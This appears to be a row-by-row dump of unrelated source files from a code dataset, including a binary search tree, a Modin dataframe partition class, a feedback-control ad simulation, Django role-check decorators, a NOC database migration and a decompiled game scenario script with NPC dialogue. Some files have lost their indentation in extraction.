    def getLowerTemp(self) -> float:
        return float(self.database.get('temp_lower')) or 21.0
    def createItem(self, itemDict: dict):
        # self.database.set(itemDict['id'], itemDict)
        # Items live in one Redis hash keyed by item id, serialized as JSON.
        self.database.hset('items', itemDict['id'], json.dumps(itemDict))
    def deleteItem(self, itemId: str):
        self.database.hdel('items', itemId)
    def listItems(self) -> [dict]:
        idToDict = self.database.hgetall('items')
        items = []
        for itemId, itemBody in idToDict.items():
            items.append(json.loads(itemBody))
        return items
|
994,990 | 3252558251ef483d63cd2c24f4e9df26988428f9 | # BinarySearchTree sample code
class BST:
    """A binary tree node: a root value plus left/right subtrees (or None)."""
    def __init__(self, root, left, right):
        self.root = root
        self.left = left
        self.right = right
    def __eq__(self, other):
        # A node never equals None; otherwise compare value and subtrees
        # recursively.
        if other is None:
            return False
        return (self.root == other.root
                and self.left == other.left
                and self.right == other.right)
class BinarySearchTree:
    """Pairs a BST root node (or None) with the ordering predicate used to
    arrange its values."""
    def __init__(self, BST, comes_before):
        self.BST = BST
        self.comes_before = comes_before
    def __eq__(self, other):
        # Never equal to None; otherwise both the tree and the predicate
        # must match.
        if other is None:
            return False
        return self.BST == other.BST and self.comes_before == other.comes_before
# Returns True when the wrapper holds no tree at all, False otherwise.
def is_empty(inputBST):
    return inputBST.BST is None
def insert(inputTree,value):
    """Insert `value` into the BinarySearchTree `inputTree`, ordering with
    its comes_before predicate, and return the resulting tree.

    Raises IndexError when inputTree is None. Mirrors the original's mixed
    style: leaf insertions mutate in place, interior insertions rebuild.
    """
    if inputTree == None:
        raise IndexError
    if inputTree.BST == None:
        # Empty tree: fresh wrapper around a single leaf node.
        return BinarySearchTree(BST(value,None,None),inputTree.comes_before)
    else:
        if inputTree.comes_before(value,inputTree.BST.root):
            if inputTree.BST.left != None:
                # BUG FIX: recursing returns a BinarySearchTree wrapper; the
                # original stored that wrapper (not its .BST node) as the
                # left child, corrupting the tree.
                return BinarySearchTree(BST(inputTree.BST.root, insert(BinarySearchTree(inputTree.BST.left,inputTree.comes_before), value).BST, inputTree.BST.right),inputTree.comes_before)
            else:
                # BUG FIX: the original assigned the raw value to .left and
                # then scrambled root/left through a broken swap; mirror the
                # right-child case by attaching a proper leaf node.
                inputTree.BST.left = BST(value,None,None)
                return inputTree
        else:
            if inputTree.BST.right != None: #has children nodes
                # BUG FIX: the original passed BST.right as the *left* child
                # and the recursion's wrapper as the right child.
                tempBST = BST(inputTree.BST.root, inputTree.BST.left, insert(BinarySearchTree(inputTree.BST.right,inputTree.comes_before),value).BST)
                return BinarySearchTree(tempBST,inputTree.comes_before)
            else: #no children nodes
                inputTree.BST.right = BST(value,None,None)
                return inputTree
#
# def lookup(inputTree,value):
# if inputTree == None:
# return BinarySearchTree(BST(None,None,None),comes_before=print_function)
# else:
# if inputTree.comes_before(value,inputTree.BST.root):
# return lookup(inputTree.BST.left,value)
# elif inputTree.comes_before(inputTree.BST.root,value):
# return lookup(inputTree.BST.right.value)
# else:
# return True
# def delete(inputTree,value):
# itExists = lookup(inputTree,value) #Checks to see whether the value is inside the given tree at all
# if itExists is False:
# return inputTree
# else:
# if inputTree.comes_before(value,inputTree.BST.root): #left
# return delete(inputTree)
|
994,991 | 473ea953d017dcb6b3288e4587ae7843cea28be3 | #!/usr/bin/python
#-*- coding: utf-8 -*-
class Product:
    """A catalog product identified by an ID and a Name."""
    def __init__(self):
        self.ID = None    # unique product identifier, unset until assigned
        self.Name = None  # human-readable product name
    # BUG FIX: the original method names contained spaces
    # ("def Add Product" / "def Remove Product"), which is a Python syntax
    # error; renamed to valid snake_case identifiers. Both remain
    # unimplemented placeholders.
    def add_product(self):
        pass
    def remove_product(self):
        pass
|
994,992 | f44be79d296a3780ed6a0893f8f40928862a3582 | # Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""The module defines interface for a partition with pandas storage format and Python engine."""
from modin.core.dataframe.pandas.partitioning.partition import PandasDataframePartition
from modin.core.execution.python.common import PythonWrapper
class PandasOnPythonDataframePartition(PandasDataframePartition):
    """
    Partition class with interface for pandas storage format and Python engine.
    Class holds the data and metadata for a single partition and implements
    methods of parent abstract class ``PandasDataframePartition``.
    Parameters
    ----------
    data : pandas.DataFrame
        ``pandas.DataFrame`` that should be wrapped with this class.
    length : int, optional
        Length of `data` (number of rows in the input dataframe).
    width : int, optional
        Width of `data` (number of columns in the input dataframe).
    call_queue : list, optional
        Call queue of the partition (list with entities that should be called
        before partition materialization).
    Notes
    -----
    Objects of this class are treated as immutable by partition manager
    subclasses. There is no logic for updating in-place.
    """
    execution_wrapper = PythonWrapper
    def __init__(self, data, length=None, width=None, call_queue=None):
        super().__init__()
        # Copy the input so later mutations of the caller's frame cannot
        # leak into this (logically immutable) partition.
        if hasattr(data, "copy"):
            data = data.copy()
        self._data = data
        if call_queue is None:
            call_queue = []
        self.call_queue = call_queue
        self._length_cache = length
        self._width_cache = width
    def get(self):
        """
        Flush the `call_queue` and return copy of the data.
        Returns
        -------
        pandas.DataFrame
            Copy of DataFrame that was wrapped by this partition.
        Notes
        -----
        Since this object is a simple wrapper, just return the copy of data.
        """
        self.drain_call_queue()
        return self._data.copy() if hasattr(self._data, "copy") else self._data
    def apply(self, func, *args, **kwargs):
        """
        Apply a function to the object wrapped by this partition.
        Parameters
        ----------
        func : callable
            Function to apply.
        *args : iterable
            Additional positional arguments to be passed in `func`.
        **kwargs : dict
            Additional keyword arguments to be passed in `func`.
        Returns
        -------
        PandasOnPythonDataframePartition
            New ``PandasOnPythonDataframePartition`` object.
        """
        def call_queue_closure(data, call_queue):
            """
            Apply callables from `call_queue` on copy of the `data` and return the result.
            Parameters
            ----------
            data : pandas.DataFrame or pandas.Series
                Data to use for computations.
            call_queue : array-like
                Array with callables and it's kwargs to be applied to the `data`.
            Returns
            -------
            pandas.DataFrame or pandas.Series
            """
            result = data.copy()
            for func, f_args, f_kwargs in call_queue:
                try:
                    result = func(result, *f_args, **f_kwargs)
                except Exception as err:
                    # Drop the queued calls on failure so a retry does not
                    # replay the failing chain, then surface the error.
                    self.call_queue = []
                    raise err
            return result
        # Materialize any queued operations first, then apply `func` to a
        # copy of the up-to-date data.
        self._data = call_queue_closure(self._data, self.call_queue)
        self.call_queue = []
        return self.__constructor__(func(self._data.copy(), *args, **kwargs))
    def drain_call_queue(self):
        """Execute all operations stored in the call queue on the object wrapped by this partition."""
        if len(self.call_queue) == 0:
            return
        # Applying the identity function forces the queued calls to run.
        self.apply(lambda x: x)
    def wait(self):
        """
        Wait for completion of computations on the object wrapped by the partition.
        Internally will be done by flushing the call queue.
        """
        self.drain_call_queue()
    @classmethod
    def put(cls, obj):
        """
        Create partition containing `obj`.
        Parameters
        ----------
        obj : pandas.DataFrame
            DataFrame to be put into the new partition.
        Returns
        -------
        PandasOnPythonDataframePartition
            New ``PandasOnPythonDataframePartition`` object.
        """
        return cls(obj.copy(), len(obj.index), len(obj.columns))
    @classmethod
    def preprocess_func(cls, func):
        """
        Preprocess a function before an ``apply`` call.
        Parameters
        ----------
        func : callable
            Function to preprocess.
        Returns
        -------
        callable
            An object that can be accepted by ``apply``.
        Notes
        -----
        No special preprocessing action is required, so unmodified
        `func` will be returned.
        """
        return func
|
994,993 | c80d97a218a4e2b60893b333f96a1526398a47c2 | '''
Input1:
3
26 40 83
49 60 57
13 89 99
Output1:
96
'''
import sys
input_size = int(sys.stdin.readline())
# accumulated[c] = minimum total cost so far with the latest house painted
# colour c (0=R, 1=G, 2=B); adjacent houses must differ in colour.
accumulated = [0]*3
for i in range(input_size):
    r, g, b = sys.stdin.readline().split(' ')
    r = int(r)
    g = int(g)
    b = int(b)
    # Each colour extends the cheaper of the two other-coloured prefixes.
    # r/g/b are computed from the *old* accumulated values before any of
    # them is overwritten.
    r += min(accumulated[1], accumulated[2])
    g += min(accumulated[0], accumulated[2])
    b += min(accumulated[0], accumulated[1])
    accumulated[0] = r
    accumulated[1] = g
    accumulated[2] = b
print(min(accumulated))
|
994,994 | 8035f3956c6a71b11b72fdd1e7029f83b55ff91f |
import math
import random
import feedback as fb
class AdPublisher( fb.Component ):
    """Simulated ad publisher: impressions served per day as a noisy,
    logarithmic function of the ad price."""
    def __init__( self, scale, min_price, relative_width=0.1 ):
        self.scale = scale           # demand scale factor
        self.min = min_price         # price below which no impressions are served
        self.width = relative_width  # relative std-dev of the demand noise
    def work( self, u ):
        if u <= self.min: # Price below min: no impressions
            return 0
        # "demand" is the number of impressions served per day
        # The demand is modeled (!) as Gaussian distribution with
        # a mean that depends logarithmically on the price u.
        mean = self.scale*math.log( u/self.min )
        demand = int( random.gauss( mean, self.width*mean ) )
        return max( 0, demand ) # Impression demand is greater than zero
class AdPublisherWithWeekend( AdPublisher ):
    """AdPublisher whose demand scale alternates between a weekday and a
    weekend value on a 7-day cycle."""
    def __init__( self, weekday, weekend, min_price, relative_width=0.1 ):
        # scale is chosen per-day in work(), so the base class gets None.
        AdPublisher.__init__( self, None, min_price, relative_width )
        self.weekday = weekday
        self.weekend = weekend
        self.t = 0  # internal day counter
    def work( self, u ):
        self.t += 1
        # Days 0 and 1 of each 7-day cycle count as the weekend.
        self.scale = self.weekend if self.t % 7 < 2 else self.weekday
        return AdPublisher.work( self, u )
# ------------------------------------------------------------
def statictest():
fb.static_test( AdPublisher, (100,2), 20, 100, 10, 5000 )
def closedloop( kp, ki, f=fb.Identity() ):
    """Run the standard closed-loop simulation; the setpoint steps from
    100 to 125 impressions/day at t=1000."""
    def setpoint( t ):
        return 125 if t > 1000 else 100
    gain = 1.0/20.0
    plant = AdPublisher( 100, 2 )
    controller = fb.PidController( gain*kp, gain*ki )
    fb.closed_loop( setpoint, controller, plant, returnfilter=f )
accumul_goal = 0  # retained for backward compatibility; no longer used internally


def closedloop_accumul( kp, ki ):
    """Closed-loop simulation against an accumulating (integrated) setpoint.

    The target grows by 100 impressions/day, 125 after t=1000, and the plant
    output is integrated before comparison.

    Bug fix: the running total is now a closure-local variable instead of the
    module-level ``accumul_goal``, so repeated calls start from zero rather
    than continuing where the previous run left off.
    """
    goal = 0
    def setpoint( t ):
        nonlocal goal
        goal += 125 if t > 1000 else 100
        return goal
    k = 1.0/20.0
    p = AdPublisher( 100, 2 )
    c = fb.PidController( k*kp, k*ki )
    fb.closed_loop( setpoint, c, p, returnfilter=fb.Integrator() )
def specialsteptest():
    # Open-loop step response: drive the plant with a fixed price of 5.50
    # and smooth the noisy impression counts with a first-order filter.
    p = AdPublisher( 100, 2 )
    f = fb.RecursiveFilter(0.05)
    for t in range( 500 ):
        r = 5.50   # constant reference (price)
        u = r      # no controller: actuation equals the reference
        y = p.work( u )   # raw (noisy) impressions
        z = f.work( y )   # smoothed impressions
        print( t, t*fb.DT, r, 0, u, u, y, z, p.monitoring() )
    quit()  # NOTE: hard-exits the interpreter so no later experiment runs
# ------------------------------------------------------------
if __name__ == '__main__':
fb.DT = 1
# statictest()
# closedloop( 0.5, 0.25 ) # default
# closedloop( 0.0, 0.25 ) # w/o prop ctrl
# closedloop( 0.0, 1.75 ) # ringing
# closedloop( 1.0, 0.125, fb.RecursiveFilter(0.125) ) #
# closedloop_accumul( 0.5, 0.125 )
|
from functools import wraps

from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.http import HttpResponse
from django.shortcuts import redirect
from django.shortcuts import render

from team.models import *
def userIsTeamLeader(function):
    """
    View decorator: allow the request only when the requesting user is the
    leader of the team named by the ``team`` URL kwarg; otherwise render
    ``errorconnected.html``.
    """
    # functools.wraps replaces the manual __doc__/__name__ copying and also
    # preserves __module__, __qualname__ and __wrapped__.
    @wraps(function)
    def wrap(request, *args, **kwargs):
        team = Team.objects.get(teamName=kwargs['team'])
        if team.teamLeader == request.user:
            return function(request, *args, **kwargs)
        return render(request, 'errorconnected.html')
    return wrap
def userIsDeveloper(function):
    """
    View decorator: allow the request only when the requesting user holds the
    "Developer" role in the team named by the ``team`` URL kwarg; otherwise
    render ``errorconnected.html``.
    """
    @wraps(function)  # replaces manual __doc__/__name__ copying
    def wrap(request, *args, **kwargs):
        member = TeamMember.objects.get(
            Q(teamName=kwargs['team']) & Q(userName=request.user))
        developer = Role.objects.get(role="Developer")
        if member.role == developer:
            return function(request, *args, **kwargs)
        return render(request, 'errorconnected.html')
    return wrap
def userIsTester(function):
    """
    View decorator: allow the request only when the requesting user holds the
    "Tester" role in the team named by the ``team`` URL kwarg; otherwise
    render ``errorconnected.html``.
    """
    # Fixes: removed leftover debug prints ("hi"/"bye"); use functools.wraps
    # instead of manual __doc__/__name__ copying.
    @wraps(function)
    def wrap(request, *args, **kwargs):
        member = TeamMember.objects.get(
            Q(teamName=kwargs['team']) & Q(userName=request.user))
        tester = Role.objects.get(role="Tester")
        if member.role == tester:
            return function(request, *args, **kwargs)
        return render(request, 'errorconnected.html')
    return wrap
def userIsMember(function):
    """
    View decorator: allow the request only when the requesting user belongs to
    the team named by the ``team`` URL kwarg; otherwise render
    ``errorconnected.html``.
    """
    @wraps(function)  # replaces manual __doc__/__name__ copying
    def wrap(request, *args, **kwargs):
        # .exists() issues a cheap EXISTS query instead of truth-testing
        # a fully evaluated queryset.
        is_member = TeamMember.objects.filter(
            Q(teamName=kwargs['team']) & Q(userName=request.user)).exists()
        if is_member:
            return function(request, *args, **kwargs)
        return render(request, 'errorconnected.html')
    return wrap
|
994,996 | b07a81276863e7cd0fac8e2ad78d131e0f30ed0b | # ----------------------------------------------------------------------
# initial
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
    """Initial PM schema: time-series storage tables, chart tables, and the
    pm_timeseries_register stored procedure."""
    depends_on = [("main", "0001_initial")]
    def migrate(self):
        # Adding model 'TimeSeries': one row per named metric stream.
        self.db.create_table(
            "pm_timeseries",
            (
                ("id", models.AutoField(primary_key=True)),
                ("name", models.CharField("Name", unique=True, max_length=128)),
                ("is_enabled", models.BooleanField("Is Enabled?", default=True)),
            ),
        )
        # Mock model so FKs below can reference the table without importing it.
        TimeSeries = self.db.mock_model(model_name="TimeSeries", db_table="pm_timeseries")
        # Adding model 'TimeSeriesData': (timestamp, value) samples per series.
        self.db.create_table(
            "pm_timeseriesdata",
            (
                ("id", models.AutoField(primary_key=True)),
                (
                    "time_series",
                    models.ForeignKey(
                        TimeSeries, verbose_name="Time Series", on_delete=models.CASCADE
                    ),
                ),
                ("timestamp", models.IntegerField("Timestamp")),
                ("value", models.FloatField("Value", null=True, blank=True)),
            ),
        )
        # Non-unique index: samples are queried by time range.
        self.db.create_index("pm_timeseriesdata", ["timestamp"], unique=False)
        # Chart definitions.
        self.db.create_table(
            "pm_chart",
            (
                ("id", models.AutoField(primary_key=True)),
                ("name", models.CharField("Name", unique=True, max_length=128)),
            ),
        )
        Chart = self.db.mock_model(model_name="Chart", db_table="pm_chart")
        # M2M join table: which time series each chart displays.
        self.db.create_table(
            "pm_chart_time_series",
            (
                ("id", models.AutoField(verbose_name="ID", primary_key=True, auto_created=True)),
                ("chart", models.ForeignKey(Chart, null=False, on_delete=models.CASCADE)),
                ("timeseries", models.ForeignKey(TimeSeries, null=False, on_delete=models.CASCADE)),
            ),
        )
        # Install the registration stored procedure (defined below).
        self.db.execute(SP_CREATE)
# PL/pgSQL helper installed by the migration above: looks up (or lazily
# creates) the named time series, then appends one (timestamp, value) sample
# to pm_timeseriesdata.
SP_CREATE = """
CREATE OR REPLACE
FUNCTION pm_timeseries_register(CHAR,INTEGER,DOUBLE PRECISION)
RETURNS VOID
AS
$$
DECLARE
p_ts_name ALIAS FOR $1;
p_timestamp ALIAS FOR $2;
p_value ALIAS FOR $3;
ts_id INTEGER;
BEGIN
LOOP
SELECT id
INTO ts_id
FROM pm_timeseries
WHERE name=p_ts_name;
IF FOUND THEN
EXIT;
ELSE
INSERT INTO pm_timeseries(name)
VALUES(p_ts_name);
END IF;
END LOOP;
INSERT INTO pm_timeseriesdata(time_series_id,timestamp,value)
VALUES(ts_id,p_timestamp,p_value);
END;
$$ LANGUAGE plpgsql;
"""
# Matching teardown statement (kept for a future reverse migration;
# not executed by migrate()).
SP_DROP = "DROP FUNCTION pm_timeseries_register(CHAR,INTEGER,DOUBLE PRECISION)"
|
994,997 | f852fbdfcfa0f8b4565618740c4f5677630bd3b8 | from ED6ScenarioHelper import *
def main():
SetCodePage("ms932")
CreateScenaFile(
FileName = 'T0601 ._SN',
MapName = 'Rolent',
Location = 'T0601.x',
MapIndex = 17,
MapDefaultBGM = "ed60016",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'Private Selbourne', # 9
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 17,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT07/CH01640 ._CH', # 00
)
AddCharChipPat(
'ED6_DT07/CH01640P._CP', # 00
)
DeclNpc(
X = -940,
Z = 7250,
Y = -94770,
Direction = 180,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x101,
InitFunctionIndex = 0,
InitScenaIndex = 3,
TalkFunctionIndex = 0,
TalkScenaIndex = 4,
)
ScpFunction(
"Function_0_D2", # 00, 0
"Function_1_D3", # 01, 1
"Function_2_E6", # 02, 2
"Function_3_FC", # 03, 3
"Function_4_120", # 04, 4
)
# NOTE: auto-generated (decompiled) scenario bytecode. The label()/Jump()/
# Return() calls below BUILD a script for the game engine -- they are not
# ordinary Python control flow, so do not restructure them.
def Function_0_D2(): pass
label("Function_0_D2")
# Empty init function: this map runs no per-frame setup logic.
Return()
# Function_0_D2 end
def Function_1_D3(): pass
label("Function_1_D3")
# Map-entry hook; OP_16's exact semantics are engine-defined (opcode args
# look like an area/camera setup -- TODO confirm against the opcode table).
OP_16(0x2, 0xFA0, 0xFFFE0818, 0xFFFD7790, 0x30012)
Return()
# Function_1_D3 end
def Function_2_E6(): pass
label("Function_2_E6")
# Infinite idle loop (condition pushes constant 1): repeatedly runs OP_99
# on character 0xFE -- presumably an idle animation; verify opcode meaning.
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_FB")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_E6")
label("loc_FB")
Return()
# Function_2_E6 end
def Function_3_FC(): pass
label("Function_3_FC")
# Infinite patrol loop: OP_8D moves the NPC within the given coordinate
# rectangle (args match the NPC's declared position range above).
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_11F")
OP_8D(0xFE, -3140, -97580, 1480, -73120, 3000)
Jump("Function_3_FC")
label("loc_11F")
Return()
# Function_3_FC end
def Function_4_120(): pass
label("Function_4_120")
TalkBegin(0xFE)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC9, 1)), scpexpr(EXPR_END)), "loc_2B2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_1D6")
ChrTalk( #0
0xFE,
(
"When I was standing guard here\x01",
"before, I could have sworn I saw\x01",
"a little girl.\x02",
)
)
CloseMessageWindow()
ChrTalk( #1
0xFE,
(
"But when I rubbed my eyes and\x01",
"looked again, she was nowhere\x01",
"to be found.\x02",
)
)
CloseMessageWindow()
Jump("loc_2AF")
label("loc_1D6")
OP_A2(0x0)
ChrTalk( #2
0xFE,
(
"When I was standing guard here\x01",
"before, I could have sworn I saw\x01",
"a little girl.\x02",
)
)
CloseMessageWindow()
ChrTalk( #3
0xFE,
(
"But when I rubbed my eyes and\x01",
"looked again, she was nowhere\x01",
"to be found.\x02",
)
)
CloseMessageWindow()
ChrTalk( #4
0xFE,
(
"I wonder if I'm running on too\x01",
"little sleep...\x02",
)
)
CloseMessageWindow()
label("loc_2AF")
Jump("loc_14D5")
label("loc_2B2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC5, 7)), scpexpr(EXPR_END)), "loc_38D")
ChrTalk( #5
0xFE,
(
"Today is the finals for the Martial\x01",
"Arts Competition.\x02",
)
)
CloseMessageWindow()
ChrTalk( #6
0xFE,
(
"I should have guessed that the\x01",
"Special Ops Unit would make it\x01",
"to the final round...\x02",
)
)
CloseMessageWindow()
ChrTalk( #7
0xFE,
(
"Though I don't want to admit it,\x01",
"they're a tough bunch.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_38D")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC4, 1)), scpexpr(EXPR_END)), "loc_46A")
ChrTalk( #8
0xFE,
(
"Starting today, the number of times\x01",
"I'll need to patrol has increased.\x02",
)
)
CloseMessageWindow()
ChrTalk( #9
0xFE,
(
"Though we haven't received any information,\x01",
"I can only imagine that those responsible\x01",
"for the terrorist acts haven't been caught.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_46A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC3, 1)), scpexpr(EXPR_END)), "loc_667")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_END)), "loc_54C")
ChrTalk( #10
0xFE,
(
"The Erbe Scenic Route is surrounded\x01",
"by beautiful greenery and is normally\x01",
"the perfect spot for a stroll.\x02",
)
)
CloseMessageWindow()
ChrTalk( #11
0xFE,
(
"However, all I can see now are leafy\x01",
"thickets that could be hiding the\x01",
"terrorist criminals...\x02",
)
)
CloseMessageWindow()
Jump("loc_664")
label("loc_54C")
OP_A2(0x0)
ChrTalk( #12
0xFE,
(
"The Erbe Scenic Route is surrounded\x01",
"by beautiful greenery and is normally\x01",
"the perfect spot for a stroll.\x02",
)
)
CloseMessageWindow()
ChrTalk( #13
0xFE,
(
"And the area is considered a park\x01",
"for the citizens of Grancel.\x02",
)
)
CloseMessageWindow()
ChrTalk( #14
0xFE,
(
"However, all I can see now are leafy\x01",
"thickets that could be hiding the\x01",
"terrorist criminals...\x02",
)
)
CloseMessageWindow()
label("loc_664")
Jump("loc_14D5")
label("loc_667")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC1, 0)), scpexpr(EXPR_END)), "loc_74A")
ChrTalk( #15
0xFE,
(
"I haven't seen any of the Royal Guard in\x01",
"the area, so I could say that things here\x01",
"are pretty peaceful at the moment.\x02",
)
)
CloseMessageWindow()
ChrTalk( #16
0xFE,
(
"But I'm sure those standing guard\x01",
"in the Royal City are under a lot\x01",
"of stress right now.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_74A")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC0, 6)), scpexpr(EXPR_END)), "loc_ABC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xDD, 1)), scpexpr(EXPR_END)), "loc_89B")
ChrTalk( #17
0xFE,
(
"Because of the size of this place,\x01",
"patrolling it is one of the biggest\x01",
"challenges.\x02",
)
)
CloseMessageWindow()
ChrTalk( #18
0xFE,
(
"Since all of the tourists are concentrated\x01",
"in the Royal City at the moment, this\x01",
"place is a bit more relaxed, but...\x02",
)
)
CloseMessageWindow()
ChrTalk( #19
0xFE,
(
"If one of the terrorists were among\x01",
"the tourists, we'd have no real way\x01",
"of knowing. It's a little scary!\x02",
)
)
CloseMessageWindow()
Jump("loc_AB9")
label("loc_89B")
OP_A2(0x6E9)
ChrTalk( #20
0xFE,
(
"Good work making it all the\x01",
"way up here.\x02",
)
)
CloseMessageWindow()
ChrTalk( #21
0xFE,
(
"I'll give you this as a souvenir.\x01",
"Ha ha, don't mind that it's a\x01",
"hand-me-down from me.\x02",
)
)
CloseMessageWindow()
OP_3E(0x21A, 1)
FadeToDark(300, 0, 100)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
OP_22(0x11, 0x0, 0x64)
AnonymousTalk( #22
"\x07\x00Received \x07\x02Carnelia - Chapter 9\x07\x00.\x02",
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk( #23
0xFE,
(
"Because of the size of this place,\x01",
"patrolling it is one of the biggest\x01",
"challenges.\x02",
)
)
CloseMessageWindow()
ChrTalk( #24
0xFE,
(
"Since all of the tourists are concentrated\x01",
"in the Royal City at the moment, this\x01",
"place is a bit more relaxed, but...\x02",
)
)
CloseMessageWindow()
ChrTalk( #25
0xFE,
(
"If one of the terrorists were among\x01",
"the tourists, we'd have no real way\x01",
"of knowing. It's a little scary!\x02",
)
)
CloseMessageWindow()
label("loc_AB9")
Jump("loc_14D5")
label("loc_ABC")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4D, 0)), scpexpr(EXPR_END)), "loc_B48")
ChrTalk( #26
0xFE,
(
"The airliners usually pass directly\x01",
"overhead, but not today.\x02",
)
)
CloseMessageWindow()
ChrTalk( #27
0xFE,
(
"I guess the rumor that all flights\x01",
"were canceled was true.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_B48")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4C, 1)), scpexpr(EXPR_END)), "loc_C3B")
ChrTalk( #28
0xFE,
(
"I guess it's about time for\x01",
"my shift replacement.\x02",
)
)
CloseMessageWindow()
ChrTalk( #29
0xFE,
(
"The cool air inside feels so\x01",
"good after spending a day out\x01",
"here standing guard.\x02",
)
)
CloseMessageWindow()
ChrTalk( #30
0xFE,
(
"All right, maybe I'll have a drink\x01",
"down in the mess hall for the\x01",
"first time in a while.\x02",
)
)
CloseMessageWindow()
Jump("loc_14D5")
label("loc_C3B")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x4B, 1)), scpexpr(EXPR_END)), "loc_E96")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_DAC")
OP_A2(0x0)
ChrTalk( #31
0xFE,
(
"Scholars and others sometimes\x01",
"come to investigate this place.\x02",
)
)
CloseMessageWindow()
ChrTalk( #32
0xFE,
(
"It seems they're interested because\x01",
"this place is actually an ancient\x01",
"ruin from long ago.\x02",
)
)
CloseMessageWindow()
ChrTalk( #33
0xFE,
(
"I guess people into old places just\x01",
"can't resist coming here...\x02",
)
)
CloseMessageWindow()
ChrTalk( #34
0xFE,
(
"Can't really see the appeal myself. It's not\x01",
"a treasure trove of knowledge so much as it\x01",
"is a workplace for me.\x02",
)
)
CloseMessageWindow()
Jump("loc_E93")
label("loc_DAC")
ChrTalk( #35
0xFE,
(
"Scholars sometimes come to\x01",
"investigate this place.\x02",
)
)
CloseMessageWindow()
ChrTalk( #36
0xFE,
(
"It seems they're interested because\x01",
"this place is actually an ancient\x01",
"ruin from long ago.\x02",
)
)
CloseMessageWindow()
ChrTalk( #37
0xFE,
(
"I wonder if people interested in old\x01",
"places just can't resist coming here.\x02",
)
)
CloseMessageWindow()
label("loc_E93")
Jump("loc_14D5")
label("loc_E96")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x49, 7)), scpexpr(EXPR_END)), "loc_1172")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x0, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_10CB")
OP_A2(0x0)
ChrTalk( #38
0xFE,
(
"Not too long ago, my only\x01",
"daughter came to visit.\x02",
)
)
CloseMessageWindow()
ChrTalk( #39
0xFE,
(
"When I told her this is where\x01",
"I worked, she was so jealous.\x02",
)
)
CloseMessageWindow()
ChrTalk( #40
0xFE,
"It's nice that children are so meek...\x02",
)
CloseMessageWindow()
ChrTalk( #41
0xFE,
(
"Now it's nice and warm during the day,\x01",
"but standing guard out here on those\x01",
"cold winter nights is the worst.\x02",
)
)
CloseMessageWindow()
ChrTalk( #42
0xFE,
(
"It's dark, cold, the wind is unrelenting,\x01",
"my skin gets chapped, and my nose\x01",
"never stops running...\x02",
)
)
CloseMessageWindow()
ChrTalk( #43
0xFE,
(
"And on summer days, it's hotter than\x01",
"an oven, and I feel myself fading in\x01",
"and out of consciousness.\x02",
)
)
CloseMessageWindow()
ChrTalk( #44
0xFE,
(
"But the view is splendid,\x01",
"so I am glad I work here.\x02",
)
)
CloseMessageWindow()
Jump("loc_116F")
label("loc_10CB")
ChrTalk( #45
0xFE,
(
"Not too long ago, my only\x01",
"daughter came to visit.\x02",
)
)
